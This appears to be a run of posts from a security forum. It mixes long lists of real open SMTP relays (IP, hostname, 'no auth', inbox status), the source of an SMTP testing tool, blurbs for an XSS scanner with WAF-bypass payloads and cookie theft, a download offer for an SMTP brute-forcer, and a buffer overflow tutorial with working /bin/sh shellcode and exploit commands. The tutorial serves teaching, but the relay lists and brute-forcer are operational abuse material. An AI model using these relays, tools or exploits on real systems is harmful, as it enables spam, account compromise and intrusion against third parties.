173-162-217-26-NewEngland.hfc.comcastbusiness.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.162.234.57:465 | no auth | SSL: True | Hostname: mail.intervations.com | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.188.88.16:25 | no auth | SSL: False | Hostname: 173_188_88_16_staticip.listrak.com | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.188.241.155:25 | no auth | SSL: False | Hostname: h155.241.188.173.static.ip.windstream.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.190.228.167:25 | no auth | SSL: False | Hostname: h167.228.190.173.static.ip.windstream.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.165.54.109:465 | no auth | SSL: True | Hostname: 173-165-54-109-Illinois.hfc.comcastbusiness.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.165.122.189:25 | no auth | SSL: False | Hostname: 173-165-122-189-Illinois.hfc.comcastbusiness.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.165.122.185:25 | no auth | SSL: False | Hostname: 173-165-122-185-Illinois.hfc.comcastbusiness.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.165.122.186:25 | no auth | SSL: False | Hostname: 173-165-122-186-Illinois.hfc.comcastbusiness.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.165.134.166:25 | no auth | SSL: False | Hostname: artcitymusic.com | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 144.92.152.221:25 | no auth | SSL: False | Hostname: mail2.wvdl.wisc.edu | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.165.207.73:465 | no auth | SSL: True | Hostname: a.qsecure.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.197.2.42:25 | no auth | SSL: False | Hostname: rrcs-173-197-2-42.west.biz.rr.com | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.197.2.44:25 | no auth | SSL: False | Hostname: rrcs-173-197-2-44.west.biz.rr.com | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.166.101.113:25 | no auth | SSL: False | Hostname: 173-166-101-113-newengland.hfc.comcastbusiness.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.167.0.210:25 | no auth | SSL: False | Hostname: 173-167-0-210-michigan.hfc.comcastbusiness.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.167.214.4:587 | no auth | SSL: True | Hostname: 173-167-214-4-ip-static.hfc.comcastbusiness.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.167.228.147:25 | no auth | SSL: False | Hostname: 173-167-228-147-ip-static.hfc.comcastbusiness.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.205.254.37:25 | no auth | SSL: False | Hostname: d63.bicentenario-mexico.com | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.221.82.170:25 | no auth | SSL: False | Hostname: 173.221.82.170.nw.nuvox.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.221.114.6:25 | no auth | SSL: False | Hostname: 173.221.114.6.nw.nuvox.net | Inbox: True | Blacklist: Not Listed | Time: 23.07.2014 - 16:22:31 173.220.110.162:25 | no auth | SSL: False | Hostname: ool-addc6ea2.static.optonline.net | Inbox: False | Blacklist: Not Listed | Time: 23.07.2014 - 16:25:57
  15. SMTPTX is a very simple tool used for sending simple email and do some basic email testing from a pentester perspective. Its able to send messages without depending on knowing a specific MTA/SMTP server beforehand. Unlike tools like sendemail it handles the MX record resolution itself and connects to the relevant server and sends the email. Its able to add attachments, use TLS and do SMTP authentication, specify custom DNS servers and SMTP servers etc. More features are under way. The tool is intended to be used when assessing the functionality and basic configuration and security settings of SMTP servers and other pentesting oriented tasks. It may also be useful as a system tool in scripts and such for sending logs and such off of a system or anything that makes the life of the legit user/administrator easier. What SMTPTX isn't The tool is NOT a spam tool and was never intended to be such a tool. Thus SMTPTX is not permitted to be used as such! The author of SMTPTX cannot be held responsible for any illegal use of the tool. Beta Code The tool is currently in a beta state as it has not been extensively tested. Only the intended basic functionality has been verified under optimal conditions. Bugs and feature suggestions may be sent my way and I'll try to fix/implement them in a somewhat near future. No promises are being made though as I lead a very busy life. The code has only been tested on Linux (Debian/Kali) as I rarely use Windows. And as such, I don't know how it will behave on Windows or Mac. However, I don't see any reasons why it shouldn't run on those platforms. Further options are planned for SMTPTX, such as VRFY, custom EHLO, logging to file and a few more. I'm also thinking of implementing interactive mode and perhaps som basic dictionary attack features etc. Time will tell for sure. #!/usr/bin/env python#============================================================================== # Title : SMTPTX # Dependencies : Python v2.7 and Python DNS Toolkit (www.dnspython.org) # Version : 1.0 Beta # Author : Copyright © 2014 <circle@0x90.se>, http://www.0x90.se # Thanks/Creds : # Abstract : This very simple tool is used for sending simple email and # do some basic email testing from a pentester perspective. # Its able to send messages without depending on an specific # MTA/SMTP server. Unlike tools like sendemail it handles the # MX record resolution itself and connects to the relevant # server and sends the email. Knowing the address of the # specific SMTP server is thus not necessary. # # License : This code is free and released under the terms of GPL v3 # # Issues : First pre-production == Some issues do exist and functions # ARE missing. It is NOT very fault tolerant at all! # The basic stuff seem to work, no extensive tests has been # done! The code has been tested only on Linux (Debian & Kali) # # Todo : Near future improvements: # - Ability to accept domain only when resolving SMTP servers # and not rely on a full email address # - Add custom EHLO host, VRFY and the like options # - Add logging to file # - Add 'quiet' option in order to suppress all output # Todo : Later improvements: # - Structure the code in a better manner # - Perhaps add interactive mode # # Change log : Initial release == Bugs for sure! # # THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND ANY CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR ANY CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS # OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY # OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF # SUCH DAMAGE. # # THIS PROGRAM MAY NOT BE USED IN ANY ILLEGAL ACTIVITIES! # #============================================================================== import sys import os import getopt import time import re import smtplib import email.utils from email.MIMEMultipart import MIMEMultipart from email.MIMEText import MIMEText from email.MIMEBase import MIMEBase from email import Encoders def banner(): print(" ") print("===========================================================================") print(" SMTPTX v1.0 Beta by <circle@0x90.se>, http://www.0x90.se GPL v3 ") print(" A small and very simple email testing tool ") print("===========================================================================") print(" ") def usage(): print(" ") print(" -h --help ") print(" Help section, and you are looking at it ") print(" ") print(" -f --from <FROM_ADDRESS> ") print(" If no from address is used, someone@somewhere.com will be used instead ") print(" ") print(" -t --to <TO_ADDRESS> ") print(" If no to address is given, the from address will be used (relay test) ") print(" ") print(" -m --message <MESSAGE> ") print(" Plain text or HTML. If no message is given, time and date will be used ") print(" ") print(" -s --subject <SUBJECT> ") print(" If no subject is given, the default string \"This is a test\" is used ") print(" ") print(" -a --attachment <FILENAME> ") print(" Given in the form of a path: \\path\\to\\file ") print(" ") print(" -d --dns <IP_ADDRESS> ") print(" Use a custom DNS server for resolving MX records ") print(" ") print(" -T --dns-timeout <SECONDS> ") print(" Set a custom DNS resolution timeout in seconds. Default is 3s ") print(" ") print(" -S --smtp-server <SMTP_SERVER> ") print(" Use a specific SMTP server ") print(" ") print(" -p --smtp-port <PORT> ") print(" Use a non-standard port for the remote SMTP server. Default is 25 ") print(" ") print(" -U --username <USERNAME> ") print(" Username for SMTP server authentication ") print(" ") print(" -P --password <PASSWORD> ") print(" Password for SMTP server authentication ") print(" ") print(" -r --resolve ") print(" Only resolve SMTP server(s) for a given email address. No email is sent") print(" Must be used in conjunction with option: -t ") print(" ") print(" -v --verbose ") print(" Verbose output. Add extra status messages to standard output ") print(" ") print(" -e --use-tls ") print(" Use encryption capabilities if SMTP server supports it ") print(" ") return def resolve_smtp_server(optsData): """ Resolve the MX record of the given email domain name e.g. hotmail.com and return a list with SMTP servers. This is kinda dirty since the DNS query returns an object and the documentation is missing some information on this. Or perhaps its just the ignorant self... TODO: """ smtpServers = [] dnsResolver = dns.resolver.Resolver() dnsResolver.timeout = optsData['dnstimeout'] dnsResolver.lifetime = optsData['dnstimeout'] if optsData['dns']: print (" Using custom DNS Server: %s" % optsData['dns']) dnsResolver.nameservers = [optsData['dns']] matchDomain = re.match(r'.*@(.*)', optsData['to'], re.M | re.I) mailDomain = matchDomain.group(1) print (" Resolving MX records for: %s\n" % mailDomain) try: mxQuery = dns.resolver.query(mailDomain, 'MX') except dns.exception.DNSException as dnsError: print(" A DNS error was encountered! Reason:\n") print(dnsError) sys.exit(1) print (" Resolved %i SMTP host(s)" % (len(mxQuery))) print ("") # Populate the hosts list with SMTP servers for mxData in mxQuery: mxRecord = repr(mxData.exchange) mxString = re.match(r'<DNS name (.*)\.>$', mxRecord, re.M | re.I) mxHost = mxString.group(1) try: # Give us the IP address of each MX host aQuery = dns.resolver.query(mxHost, 'A')[0].address except dns.exception.DNSException as dnsError: print(" A DNS error was encountered! Reason:\n") print(dnsError) sys.exit(1) print(" - %s -> %s" % (mxHost, aQuery)) smtpServers.append(mxHost) print("") optsData['smtpServer'] = smtpServers[0] return def send_email(optsData): """ Send the email based on the dictionary passed to this function. TODO: """ emailMessage = MIMEMultipart() emailMessage['To'] = email.utils.formataddr(('', optsData['to'])) emailMessage['From'] = email.utils.formataddr(('', optsData['from'])) emailMessage['Subject'] = optsData['subject'] emailMessage.attach(MIMEText(optsData['message'])) if optsData['attachment']: add_attachment(optsData, emailMessage) if optsData['verbose']: print (" This is what will be sent:\n") print (emailMessage.as_string()) if optsData['attachment']: print (" Attached file: %s\n" % optsData['attachment']) try: if optsData['verbose']: print (" Using SMTP server: %s:%d\n" % (optsData['smtpServer'], optsData['smtpPort'])) smtpHandler = smtplib.SMTP(optsData['smtpServer'], optsData['smtpPort']) smtpHandler.set_debuglevel(optsData['verbose']) # We need to perform a EHLO in order to get a list of supported features smtpHandler.ehlo() if optsData['usetls']: if smtpHandler.has_extn('STARTTLS'): try: print ("\n Server supports TLS, using it...\n") smtpHandler.starttls() except smtplib.SMTPException as smtpError: print (" Failure of biblical proportions! Unable to send email. Reason:\n") print (" %s\n" % smtpError) sys.exit(1) else: print (" Server does not seem to support TLS, skipping...\n") # Reidentify over TLS if set up smtpHandler.ehlo() if optsData['username'] and optsData['password']: try: smtpHandler.login(optsData['username'], optsData['password']) except smtplib.SMTPAuthenticationError: print(" Authentication failure!\n") print(" Will try to ignore...\n") smtpHandler.sendmail(optsData['from'], [optsData['to']], emailMessage.as_string()) smtpHandler.quit() print ("\n The email has been sent!\n") except smtplib.SMTPException as smtpError: print (" Failure of biblical proportions! Unable to send email. Reason:\n") print (" %s\n" % smtpError) sys.exit(1) return def add_attachment(optsData, emailMessage): """ Add any type of attachment to the email. TODO: Add attachment size check? """ part = MIMEBase('application', "octet-stream") # part.set_payload(open(optsData['attachment'], "rb").read()) try: attachment = open(optsData['attachment'], "rb") # We will exit as a safety precaution as we perhaps don't want to screw up for # example a social engineering campaign due to a simple file not found error! except IOError as fileError: print(" Unable to open the attachment file! Reason:\n") print(fileError) sys.exit(1) part.set_payload(attachment.read()) Encoders.encode_base64(part) part.add_header('Content-Disposition', 'attachment; filename=%s' % os.path.basename(optsData['attachment'])) emailMessage.attach(part) return def main(): """ Main function and argument collector/processor TODO: """ optsData = {'to': '', 'from': 'someone@somewhere.com', 'subject': 'This is a test', 'message': time.asctime(time.localtime(time.time())), 'verbose': False, 'smtpServer': '', 'smtpPort': 25, 'dns': '', 'dnstimeout': 3, 'resolve': False, 'attachment': '', 'username': False, 'password': False, 'usetls': False} banner() try: if len(sys.argv) < 2: print("Too few arguments supplied...") usage() sys.exit(1) opts, args = getopt.getopt(sys.argv[1:], "hvf:t:m:s:d:T:S:p:ra:U:P:e", ["help", "verbose", "from=, "to=", "message=", "subject=", "dns=", "dns-timeout=", "smtp-server=", "smtp-port=", "resolve", "attachment=", "username=", "password=", "use-tls]) except getopt.GetoptError as err: print(err) usage() sys.exit(1) for opt, arg in opts: if opt in ('-h', '--help'): usage() sys.exit(2) elif opt in ('-v', '--verbose'): optsData['verbose'] = True elif opt in ('-f', '--from'): optsData['from'] = arg elif opt in ('-t', '--to'): optsData['to'] = arg elif opt in ('-s', '--subject'): optsData['subject'] = arg elif opt in ('-m', '--message'): optsData['message'] = arg elif opt in ('-d', '--dns'): optsData['dns'] = arg elif opt in ('-T', '--dns-timeout'): optsData['dnstimeout'] = int(arg) elif opt in ('-a', '--attachment'): optsData['attachment'] = arg elif opt in ('-S', '--smtp-server'): optsData['smtpServer'] = arg elif opt in ('-p', '--smtp-port'): optsData['smtpPort'] = int(arg) elif opt in ('-r', '--resolve'): optsData['resolve'] = True elif opt in ('-U', '--username'): optsData['username'] = arg elif opt in ('-P', '--password'): optsData['password'] = arg elif opt in ('-e', '--use-tls'): optsData['usetls'] = True else: usage() sys.exit(1) if optsData['resolve']: if not optsData['to']: print(" Error: No recipient address was given!") usage() sys.exit(1) resolve_smtp_server(optsData) sys.exit(0) elif optsData['smtpServer']: send_email(optsData) else: resolve_smtp_server(optsData) send_email(optsData) if __name__ == "__main__": try: import dns.resolver import dns.exception except ImportError: print(" Import Error: You seem to be missing the DNS Python library! ") print(" Either check your installation or go to www.pythondns.org ") print(" Also try using: sudo pip install dnspython ") sys.exit(1) main() # ---[ EOF ]--- Source
  16. XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation (Working in two Methods) • Method number 1 for Confirmation Request and Response • Method number 2 for Confirmation Execute encoded payload and search for the same payload in web HTML code but decoded • Support HTTPS • After Confirmation (execute payload to get cookies) • Identify 3 Types of WAF (Mod_Security - WebKnight - F5 BIG IP) • Can be run in (Windows - Linux) XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall) It Also Support Saving the Web Html Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal $ Python xssya.py Links should end with (/or=or?) Example $ Python xssya.py http://www.domain.com/ http://www.domain.com= http://www.domain.com? The only Module need to download is colorama-0.2.7 https://pypi.python.org/pypi/colorama Note: Crawling (need to be enhanced) Download: Download: XSSYA Cross Site Scripting Scanner ? Packet Storm Author: Yehiamamdouh51@hotmail.com secure-edf provide tools for web application articles & videos check xssya xss - cross site scripting scanner and vulnerability confiramtion
  17. Autor: Ar3s Content: connection_fix.reg log-valid.txt SMTP-Error-Log.txt ip.txt SmtpBruter.exe test1 keys.txt wordlist.txt Virustotal Rulati in masina virtuala Download: http://uppit.com/uod04irry320/SMTP_BRUTER.RAR Necesita .NET Framework 4 ...
  18. Prerequisites: Basic/Intermediate knowledge of Assembly Language Basic/Intermediate knowledge of GDB (GNU Debugger) Which is the debugger I will be using for this tutorial A good understanding of the C/C++ Languages A good understanding of how the stack is ordered and processed in a computer Introduction: A Buffer Overflow, is a vulnerability which is encountered when a program writing data to a buffer, exceeds the bounds of the buffer, causing the excess data to overflow into adjacent memory. Picture this, we have created a C program, in which we have initialized a variable, buffer, of type char, with a buffer size of 500 bytes: int main(void) { char buffer[500]; } And in this program, we take input from the command line, which is then copied to a buffer, via the C function strcpy(). int main(int argc, char *argv[]) { char buffer[500]; strcpy(buffer, argv[1]); } Notice, that we have not checked whether or not the length of argv[1] is within the buffers range of 500 bytes; Why not? Well, you'd think that like most modern day programming languages, the strcpy() function would check this before copying the data to the buffer? This is not the case, and is a common misconception made my novice programmers who are not aware of the security implications regarding certain functions, which is why this vulnerability exists and may continue to exist further into the future. Now, you may be wondering how you could possibly exploit such a vulnerability, I mean what good is writing a few bytes into memory.. Well, on it's own, nothing, but if you were to overwrite the return pointer of the function which you are within, you could ultimately alter the flow of code execution within the program that you are targeting. For example, in the program above, say that theoretically the memory location of buffer starts at 0x00000000, and ends at 0x0000007D (which should have 500 bytes of space), and that the return pointer is located 524 Bytes away from that, it would take an input of 1024 Bytes, e.g 1024 "A"'s, to get "behind" the return pointer, which means that you can then overwrite the next 4 bytes of memory defined as the return pointer, and then watch as it is POP'ed into the EIP register, and executes whatever code, malicious or otherwise, which may lie on the other end address you specify. Now we get on to the really fun bit, where we actually get to exploit a program which is susceptible to this exploit vector. If you are going to attempt this on your own computer, firstly, make sure you are NOT using Windows >= Vista, as Windows >= Vista, have protections in place, such as ESP (Executable Space Protection), ASLR (Address Space Layout Randomization), and various other exploit prevention techniques. It would be more advisable to use operating systems such as Linux, Unix, and other Unix based operating systems to get this working, as it's easier to disable the countermeasures put in place by running a command such as: sudo echo > /proc/sys/kernel/randomize_va_space Which will disable your systems ASLR until you reboot, which is not an option in Windows operating systems (that I'm aware of). If you do not have access to a Linux operating system, or are too lazy to dual boot or install a VM, you can SSH into various wargaming servers (such as Smash The Stack or Over The Wire) to practice the skills learned here in a legal and safe way, with minimalistic effort, for all you lazy h4xx0rs out there. Now, on with thy spl0itz. I'm going to use a simple source code from Smash The Stack : Blowfish, which does not currently have a webpage. Here is the code: #include <stdio.h> int main(int argc, char * argv[]) { char buf[256]; if(argc == 1) { printf("Usage: %s input\n", argv[]); exit(); } strcpy(buf,argv[1]); printf("%s", buf); } As you can see, it follows the same principles as the example code used previously in the tutorial, but with some extra validation to make sure that argv[1] is present. So, lets compile this code and continue. In this tutorial, I'm going to use GCC (GNU C Compiler) from the GNU Compiler Collection to compile my code. I will compile using the following command: gcc bof.c -g -fno_stack_protector -o bof Which will compile the code with required headers for gdb to be able to debug it, and also disable gcc's stack protection in systems which have patched gcc to have it enabled by default. Once we have compiled our vulnerable code, we can open the executable, which I have called "bof", with GDB, for debugging, using the command: gdb bof Which should give you something similar to this: Now that we are in GDB, we can start getting into the real exploitation; firstly, we want to make sure that we can run the executable correctly from GDB. We can do this simply by typing "run", which should return: If it returns an error instead, then try moving to a folder where you have sufficient permissions. Assuming that the program executes, then exits normally, we can carry on. We now need to establish how many bytes we have to enter until we have control over the return pointer. There is two main ways to do this: Trial and error or A string which never repeats a sequence of bytes, allowing for easy identification I tend to just use trial and error, as the second option requires the Metasploit Framework, which may not be available on machines such as the ones you will encounter while wargaming. run perl -e 'print "A" x 512' which for me, causes a segmentation fault, which occurs when EIP is set to an address which cannot be executed, or is outside of the available memory for the program. So, now that we know the return pointer resides within 512 bytes of the start of our buffer, we can start to slowly decrement the amount of "A"'s that we print, until the program executes without error, and returns "Program Exited Normally.", which for me, occurs at 268 Bytes, which is only 12 Bytes away from the end of our buffer. This means that the return pointer lies between 268 Bytes and 273 Bytes. Armed with this knowledge, we can move on to adding in our shellcode, which is comprised of the opcodes of Assembly instructions. The shellcode I will be using for this tutorial is a /bin/sh shellcode written by a fairly recently retired member of SoldierX, jip, which will drop you into a bash shell which has the permissions of the program you are attacking. Here it is: \x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 So, what do we do now? Well, we have to incorporate this into our exploit. we do this by first adding the shellcode into the Perl string, giving us this bash / Perl code: So, for trial and error, we want to type run: run perl -e 'print "A" x 268 . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' And then we must take away the amount of Bytes the shellcode contains, from the overall amount of "A"'s (or whatever filler you are using), so that we still retain control over the return pointer. In order to do this, we must replace the number "268", with "(268 - 26)", where 26 is the amount of Bytes in the shellcode (Every 2 Bytes in the shellcode equates to one Byte in Hex, the "\x" signifies the following 2 Bytes are a hexadecimal Byte). This will give is this code: run perl -e 'print "A" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' This command on it's own will not actually give us a working exploit; for that, we need to find out the address of where our shellcode is stored. But before we get into the nitty gritty with Assembly Language, I want to make 2 more adjustments to our current exploit: A nop sled An address "placeholder", as the longer or shorter the exploit is, the more the memory allocations shift around. by giving us a placeholder, we are securing a permanent place in memory The altered code will look like this: run perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xff\xff\xff\xff"' Now, we've got an almost working exploit, all we have to do now, is find that memory address, to do that, we have to run "disas main", which will give us the following result: This is where you will need to have some knowledge of Assembly to get through As you can see, we have a full dump of the programs Assembly code; so, what do we do with it? Well, first, we have to look for the call to strcpy(), which should be pretty easy, as it's marked in the Assembly code as "strcpy@plt". So once he know where the strcpy() is called, we can set a break point to pause before it is called, and examine the stack. To do this, run the command "break *main+79". Run the program again, and we should get something like: which signifies that the program is waiting at the specified breakpoint. We now want to examine the top two pointers on the stack, which are the arguments which will be passed to the strcpy() function. To do this we type "x/2x $esp", which will give us: The two addresses after the colon are the addresses that we are interested in. To view what data they hold, we have to type "x/s 0xbfffd6d0", which will give us: Which is clearly not our shellcode, so this must be the buffer before we have written to it. So, if we type "x/s 0xbfffd974", we should see our shellcode. Hmm.. Well that's odd.. No shellcode. Oh yeah, it's further down, past the Nops. Press enter once and we should see it. That's it! We know where our shellcode is stored, so now we can take the address "0xbfffd974" and substitute it right into the exploit.. right? Nope, we must swap the byte order around due to a "phenomena" known as Little Endian byte order, which causes byte orders to switch around inside addresses. So, we switch around the Bytes to give us "74 d9 ff bf", which then need to have "\x" prepended, as they are hex bytes, which will give us "\x74\xd9\xff\xbf". This can now be substituted into our exploit to give us the Perl code: run perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x74\xd9\xff\xbf"' Which, when run, should give us a shell (Note that sometimes GDB does not have the permissions required, so you should run it outside GDB, by typing "quit", then replacing "run" with the name of the binary): WE DID IT! From now on, you will have a shell in the specified application (until you choose to quit)! Once you do quit, however, the program will crash, and most likely cause Denial Of Service in programs such as web servers, which are responsible for serving data to clients. I'm not going to cover how to alter the flow of execution so that the program continues to function correctly, as this is meant to be a tutorial explaining the basics of the buffer overflow, how the concept works and is exploited, so, that is the end of my Buffer Overflow Exploitation tutorial, I hope that you learned how to exploit buffer overflows quickly and easily (if not, feel free to pm me with any questions or problems and I'll make sure to get back to you), thanks a lot. Author: xAMNESIAx Source
      • 2
      • Upvote
  19. 176.9.18.60:25 | no auth | SSL: False | Hostname: ventusmail.com | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 05:17:38 195.124.8.34:25 | no auth | SSL: False | Hostname: apac014.fra.samsungsocialhub.com | Inbox: False | Blacklist: Not Listed | Time: 22.06.2014 - 19:13:11 195.124.8.35:25 | no auth | SSL: False | Hostname: apac015.fra.samsungsocialhub.com | Inbox: False | Blacklist: Not Listed | Time: 22.06.2014 - 19:13:23 195.124.8.3:25 | no auth | SSL: False | Hostname: na013.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.5:25 | no auth | SSL: False | Hostname: na015.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.56:25 | no auth | SSL: False | Hostname: na006.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.12:25 | no auth | SSL: False | Hostname: eu012.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.17:25 | no auth | SSL: False | Hostname: eu017.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.2:25 | no auth | SSL: False | Hostname: na012.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.51:25 | no auth | SSL: False | Hostname: na001.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.52:25 | no auth | SSL: False | Hostname: na002.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.6:25 | no auth | SSL: False | Hostname: na016.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.40:25 | no auth | SSL: False | Hostname: apac020.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.39:25 | no auth | SSL: False | Hostname: apac019.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:25 195.124.8.42:25 | no auth | SSL: False | Hostname: apac002.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:26 195.124.8.50:25 | no auth | SSL: False | Hostname: apac010.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:26 195.124.8.48:25 | no auth | SSL: False | Hostname: apac008.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:26 195.124.8.22:25 | no auth | SSL: False | Hostname: eu022.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:29 195.124.8.55:25 | no auth | SSL: False | Hostname: na005.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:29 195.124.8.1:25 | no auth | SSL: False | Hostname: na011.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:29 195.124.8.8:25 | no auth | SSL: False | Hostname: na018.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:29 195.124.8.53:25 | no auth | SSL: False | Hostname: na003.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:29 195.124.8.21:25 | no auth | SSL: False | Hostname: eu021.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:29 195.124.8.123:25 | no auth | SSL: False | Hostname: apac015-stage.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.4:25 | no auth | SSL: False | Hostname: na014.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.7:25 | no auth | SSL: False | Hostname: na017.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.16:25 | no auth | SSL: False | Hostname: eu016.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.122:25 | no auth | SSL: False | Hostname: apac011-stage.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.125:25 | no auth | SSL: False | Hostname: qa010.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.15:25 | no auth | SSL: False | Hostname: eu015.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.57:25 | no auth | SSL: False | Hostname: na007.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.46:25 | no auth | SSL: False | Hostname: apac006.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.44:25 | no auth | SSL: False | Hostname: apac004.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.43:25 | no auth | SSL: False | Hostname: apac003.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.54:25 | no auth | SSL: False | Hostname: na004.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.47:25 | no auth | SSL: False | Hostname: apac007.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.59:25 | no auth | SSL: False | Hostname: na009.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.10:25 | no auth | SSL: False | Hostname: na020.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.13:25 | no auth | SSL: False | Hostname: eu013.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:33 195.124.8.58:25 | no auth | SSL: False | Hostname: na008.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 